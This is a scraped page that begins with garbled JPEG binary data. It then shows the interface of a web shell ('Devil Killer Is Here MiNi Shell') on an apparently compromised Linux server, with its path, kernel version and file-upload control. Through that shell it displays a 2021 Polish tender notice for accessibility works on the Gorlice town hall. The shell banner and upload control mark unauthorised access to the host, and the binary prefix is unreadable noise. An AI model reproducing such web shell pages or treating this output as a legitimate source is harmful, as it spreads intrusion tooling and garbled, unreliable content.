JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210811/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210811/0014603701-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00146037 z dnia 2021-08-11</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> PRZEBUDOWĘ BUDYNKU RATUSZA W RAMACH ZADANIA „DOSTOSOWANIE OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ DLA POTRZEB MIESZKAŃCÓW MIASTA GORLICE I POWIATU GORLICKIEGO WRAZ Z PRZEBUDOWĄ CIĄGU KOMUNIKACYJNEGO” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miasto Gorlice</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 491893204</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Rynek 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gorlice</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-300</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL218 - Nowosądecki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">18 3551252</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zampub@um.gorlice.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.gorlice.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> PRZEBUDOWĘ BUDYNKU RATUSZA W RAMACH ZADANIA „DOSTOSOWANIE OBIEKTÓW UŻYTECZNOŚCI PUBLICZNEJ DLA POTRZEB MIESZKAŃCÓW MIASTA GORLICE I POWIATU GORLICKIEGO WRAZ Z PRZEBUDOWĄ CIĄGU KOMUNIKACYJNEGO” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-95a414c5-fa78-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00146037</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-11</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00000932/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.10 Dostosowanie dostępności segmentu "B" dla osób niepełnosprawnych w ramach "Budowy przejścia pomiędzy segmentami budynku Ratusza"</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/494370 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">adres strony internetowej<br/>prowadzonego postępowania: https://platformazakupowa.pl/transakcja/494370,<br/>adres poczty elektronicznej: e-mail zampub@um.gorlice.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Informacje ogólne: 1) Przedmiotowe postępowanie prowadzone jest przy użyciu środków komunikacji<br/>elektronicznej. W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a<br/>wykonawcami, przekazywanie dokumentów elektronicznych odbywa się wyłącznie przy użyciu środków<br/>komunikacji elektronicznej tj.: a) platformy zakupowej platformazakupowa.pl Open Nexus Sp. z o.o.,<br/>zwanej platformą zakupową, pod adresem:<br/>https://platformazakupowa.pl/transakcja/494370 . Korzystanie z platformy zakupowej przez<br/>Wykonawcę jest bezpłatne. b) poczty elektronicznej e-mail: zampub@um.gorlice.pl . 2) Dokumenty<br/>przekazywane w postępowaniu sporządza się w postaci elektronicznej. 3) Zmiany i wyjaśnienia treści<br/>SWZ oraz inne dokumenty zamówienia bezpośrednio związane z postępowaniem o udzielenie<br/>zamówienia udostępniane będą na stronie internetowej prowadzonego postępowania<br/>https://platformazakupowa.pl/transakcja/494370 . 4) Regulamin, warunki, zasady, instrukcje i<br/>szczegółowe informacje dotyczące korzystania z platformy zakupowej, wymagania techniczne i<br/>organizacyjne sporządzania, wysyłania i odbierania korespondencji elektronicznej dostępne są na<br/>stronie platformy zakupowej Open Nexus Sp. z o.o. pod adresem: https://platformazakupowa.pl .<br/>2.Złożenie oferty: 1) Wykonawca składa ofertę wyłącznie przy użyciu środków komunikacji elektronicznej<br/>za pośrednictwem platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/494370<br/>.2) Ofertę należy sporządzić w języku polskim i złożyć pod rygorem nieważności, w formie<br/>elektronicznej (opatrzonej kwalifikowanym podpisem elektronicznym) lub w postaci elektronicznej<br/>opatrzonej podpisem zaufanym lub podpisem osobistym. Wykonawca w celu złożenia zamawiającemu<br/>oferty wybiera polecenie „Złóż ofertę” dostępne na platformie zakupowej przedmiotowego<br/>postępowania. Sposób złożenia oferty opisany został w instrukcji dla wykonawców dostępnej na stronie<br/>platformy zakupowej pod adresem: https://platformazakupowa.pl .<br/>3. Sposób komunikowania się<br/>zamawiającego z wykonawcami (nie dotyczy składania ofert): 1) W postępowaniu o udzielenie<br/>zamówienia komunikacja pomiędzy zamawiającym a wykonawcami np. składanie dokumentów,<br/>oświadczeń, zawiadomień, zapytań, innych informacji odbywa się elektronicznie za pośrednictwem<br/>platformy zakupowej pod adresem: https://platformazakupowa.pl/transakcja/494370 i formularza „Wyślij<br/>wiadomość”. 2) W sytuacjach awaryjnych, np. gdy korzystanie z platformy byłoby chwilowo utrudnione<br/>zamawiający dopuszcza również komunikowanie się pomiędzy zamawiającym a wykonawcami za<br/>pomocą poczty elektronicznej e-mail: zampub@um.gorlice.pl .4. Sposób sporządzania i przekazywania<br/>dokumentów elektronicznych, wymagania techniczne dla dokumentów elektronicznych, wymagania<br/>techniczne i organizacyjne użycia środków komunikacji elektronicznej służących do odbioru<br/>dokumentów elektronicznych określa rozporządzenie Prezesa Rady Ministrów z dnia 30 grudnia 2020<br/>r. w sprawie sposobu sporządzania i przekazywania informacji oraz wymagań technicznych dla<br/>dokumentów elektronicznych oraz środków komunikacji elektronicznej w postępowaniu o udzielenie<br/>zamówienia publicznego lub konkursie. 5. Podmiotowe środki dowodowe oraz inne dokumenty lub<br/>oświadczenia, o których mowa w rozporządzeniu Ministra Rozwoju, Pracy i Technologii z dnia 23<br/>grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub<br/>oświadczeń, jakich może żądać zamawiający od wykonawcy, składa się w formie elektronicznej<br/>opatrzone kwalifikowanym podpisem elektronicznym lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, Zamawiający informuje, że:<br/>1) administratorem Pani/Pana danych osobowych jest Burmistrz Miasta Gorlice, z siedzibą: Urząd<br/>Miejski w Gorlicach, Rynek 2, 38- 300 Gorlice.<br/>2) inspektorem ochrony danych osobowych w Urzędzie Miejskim w Gorlicach jest Pani Katarzyna<br/>Walczy, tel. 18 35 51 228, e-mail: walczy@um.gorlice.pl<br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego.<br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie<br/>dokumentacja postępowania w oparciu o art. 18 oraz art. 74 ustawy Pzp.<br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres 4<br/>lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy.<br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosownie do art. 22 RODO.<br/>8) posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie:<br/>skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz<br/>nie może naruszać integralności protokołu oraz jego załączników);<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (Wyjaśnienie: prawo<br/>do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu<br/>zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej<br/>lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa<br/>członkowskiego);<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>nie przysługuje Pani/Panu:<br/>a) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>b) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>c) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OR-III.271.2.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 521690,54 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.1. Przedmiotem zamówienia jest wykonanie robót budowlanych przebudowy budynku Ratusza<br/>w ramach zadania „Dostosowanie obiektów użyteczności publicznej dla potrzeb mieszkańców<br/>Miasta Gorlice i Powiatu Gorlickiego wraz z przebudową ciągu komunikacyjnego”, których<br/>zakres obejmuje:<br/>1) budowę pochylni dla niepełnosprawnych od wejścia z Placu Kościelnego,<br/>2) budowę windy w segmencie B Urzędu Miasta wraz z jej obudową płytą g-k ogniową, płytą<br/>OSB, styropianem grafitowym o grubości 14 cm (EPS 70 λ=0,035 W/m*K) z wykończeniem<br/>zbrojonym tynkiem silikatowo - silikonowym (dostosowaną do elewacji budynku B) z<br/>wykonaniem dwóch imitacji okien, wraz z dostawą i montażem dźwigu według parametrów<br/>wynikających z dokumentacji opisanej w ust. 1.3.,<br/>3) remont korytarza na pierwszym piętrze budynku B – dojście do łazienek: szpachlowanie ścian<br/>i sufitu z ich malowaniem, przerobieniem w niezbędnym zakresie instalacji elektrycznej,<br/>wymiana dwóch sztuk drzwi wraz z ościeżnicami oraz ułożenie posadzki z płytek gresowych –<br/>rzut pomieszczenia wg załącznika nr 9 do SWZ - Rzut pierwszego piętra budynku B,<br/>Ogłoszenie nr 2021/BZP 00080457/01 z dnia 2021-06-11<br/>2021-06-11 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>4) remont / zapewnienie prawidłowej wielkości pomieszczeń sanitarnych dla niepełnosprawnych<br/>na poziomie I i II piętra w budynku B wraz z ich wyposażeniem w biały montaż, elektryczne<br/>podumywalkowe ogrzewacze wody oraz wszelkie niezbędne akcesoria łazienkowe (np. suszarki<br/>do rąk, lustra, uchwyty, dozowniki do mydła, itp.),<br/>5) montaż / wymianę wewnętrznej stolarki drzwiowej (10 szt. - łazienki, 1 szt. EI 60 w przejściu<br/>między budynkami, 2 szt. drzwi w powstałym korytarzu przejściowym dla niepełnosprawnych w<br/>budynku B, 1 szt. drzwi do pom. magazynowego w piwnicy oraz 2 szt. w korytarzu prowadzącym<br/>do łazienek na pierwszym piętrze budynku B – j.w.),<br/>6) przełożenie drzwi wewnętrznych przy wejściu do windy na parterze,<br/>7) wykonanie wentylacji pomieszczeń sanitarnych,<br/>8) demontaż pomieszczenia socjalnego w pomieszczeniu, w którym będzie wydzielone przejście<br/>między segmentami A i B w budynku B (rys. P1 ze zmianami – zał. nr 5 do SWZ),<br/>9) wydzielenie korytarza przejściowego w budynku B dla osób niepełnosprawnych przez budowę<br/>ścianki działowej z naświetlami (wg. rys. P1 ze zmianami – zał. nr 5 do SWZ),<br/>10) wykonanie pomieszczenia socjalnego w pomieszczeniu o którym mowa w pkt. 8) i 9),<br/>11) budowę przejścia pomiędzy budynkami A i B Urzędu Miasta wraz z wykonaniem ścianki<br/>działowej oraz budową pochylni – wg projektu stanowiącego załącznik nr 1 do SWZ.<br/>Wykończenie przewiązki Wykonawca winien wykonać z uwzględnieniem rzutów aranżacji<br/>stanowiących załącznik nr 8 do SWZ,<br/>12) wykonanie niezbędnych instalacji wchodzących w zakres zamówienia.<br/>1.2. Oprócz robót wymienionych w ust. 1.1. i określonych w dokumentacji o której mowa w ust.<br/>1.3. wykonawca wykona przedmiot umowy z uwzględnieniem następujących uwarunkowań:<br/>1) instalacje elektryczne w wydzielonym korytarzu, pokoju biurowym i socjalnym oraz przejściu<br/>między budynkami należy wykonać z wykorzystaniem istniejącej instalacji.<br/>2) wszystkie wymiary konstrukcji dźwigu wykonawca winien dostosować do typu zastosowanego<br/>dźwigu windowego.<br/>3) Wykonawca winien przy wykonaniu zadania uwzględnić zmiany wynikające z obowiązujących<br/>przepisów i norm.<br/>4) na obiekcie będą prowadzone równolegle przez innego wykonawcę roboty budowlano –<br/>instalacyjne związane termomodernizacją budynków A i B Urzędu Miasta Gorlice, w związku z<br/>tym przy wykonaniu robót instalacyjno – budowlanych należy uwzględnić wytyczne zakresu prac<br/>teromodernizacyjnych planowanych równolegle do realizacji niniejszego zadania oraz zapewnić<br/>uczestnictwo kierownika budowy w radach budowy dla robót prowadzonych równolegle na<br/>obiekcie celem koordynacji działań. 1.3.	Dokumentacja opisująca przedmiot zamówienia:<br/>1)	Projekt budowlany „Dostosowanie dostępności segmentu B dla osób niepełnosprawnych w ramach „Budowy przejścia pomiędzy segmentami budynku Ratusza” – zał. nr 1 do SWZ,<br/>2)	Decyzja pozwolenia na budowę nr 45/2018 z dnia 22.01.2018 roku znak: AB.6740.794.2017 – zał. nr 2 do SWZ,<br/>3)	Rysunek 19 ze zmianami – zał. nr 3 do SWZ,<br/>4)	Rysunek K5 ze zmianami – zał. nr 4 do SWZ,<br/>5)	Rysunek P1 ze zmianami – zał. nr 5 do SWZ,<br/>6)	Rysunek K1 ze zmianami – zał. nr 6 do SWZ,<br/>7)	Rysunek wykonawczy pochylni między budynkami A i B UM Gorlice – zał. nr 7 do SWZ,<br/>8)	Rzuty z aranżacji wnętrz w zakresie przewiązki – zał. nr 8 do SWZ,<br/>9)	Rzut pierwszego piętra budynku B – zał. nr 9 do SWZ,<br/>10)	Specyfikacja techniczna wykonania i odbioru robót – zał. nr 10 do SWZ,<br/>11)	Tabela kryteriów nazw własnych użytych w opisie zamówienia – zał. nr 11 do SWZ.<br/>12)	Charakterystyka techniczna dźwigu osobowego – zał. nr 21 do SWZ<br/>1.4. Przedmiary robót:<br/>1) Przedmiar robót budowano sanitarnych – zał. nr 12 do SWZ,<br/>2) Przedmiar robót branży elektrycznej – zał. nr 13 do SWZ,<br/>stanowią element pomocniczy opisu przedmiotu zamówienia i ze względu na ryczałtowy<br/>charakter wynagrodzenia nie będą stanowiły podstawy do rozliczeń pomiędzy Zamawiającym a<br/>Wykonawcą. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45210000-2 - Roboty budowlane w zakresie budynków</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45311200-2 - Roboty w zakresie instalacji elektrycznych</p> <p class="mb-0">45313100-5 - Instalowanie wind</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2021-12-10</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze oferty zamawiający będzie się kierował następującymi<br/>kryteriami i ich wagami: 1) cena - 60% - sposób oceny: minimalizacja (według wzoru), 2) okres<br/>gwarancji - 40% - sposób oceny: maksymalizacja (według wzoru).<br/>Zamawiający dokona oceny złożonych ofert w oparciu o wyżej przedstawione kryteria i ich wagi.<br/>Ofertom przyznane zostaną punkty obliczone następująco:<br/>Kryterium – cena<br/>(Cn / Cof.b. x 100) x 60% = ilość punktów, gdzie:<br/>Cn - najniższa cena spośród ofert,<br/>Cof.b. - cena oferty badanej,<br/>100 - wskaźnik stały,<br/>60% - procentowe znaczenie kryterium ceny.<br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „cena” otrzyma<br/>maksymalną ilość 60 punktów (60%). Pozostałym wykonawcom spełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów.<br/>Kryterium – okres gwarancji<br/>Wykonawca zobowiązany jest podać w ofercie okres gwarancji jaki udzieli na cały wykonany przedmiot<br/>zamówienia w miesiącach, licząc od daty odbioru końcowego. Okres gwarancji należy podać w pełnych<br/>miesiącach.<br/>Najniższy dopuszczalny okres gwarancji podlegający ocenie – 36 miesięcy,<br/>Najwyższy okres gwarancji podlegający ocenie – 60 miesięcy.<br/>(Gof.b. / Gn x 100) x 40% = ilość punktów, gdzie:<br/>Gof.b. - okres gwarancji oferty badanej,<br/>Gn - najwyższy okres gwarancji spośród ofert,<br/>100 - wskaźnik stały,<br/>40% - procentowe znaczenie kryterium okresu gwarancji.<br/>Oferta spełniająca w najwyższym stopniu wymagania określone w kryterium „okres gwarancji” otrzyma<br/>maksymalną ilość 40 punktów (40%). Pozostałym wykonawcom spełniającym wymagania kryterialne<br/>przypisana zostanie odpowiednio (proporcjonalnie) mniejsza ilość punktów.<br/>Punkty w powyższych kryteriach zostaną zsumowane.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 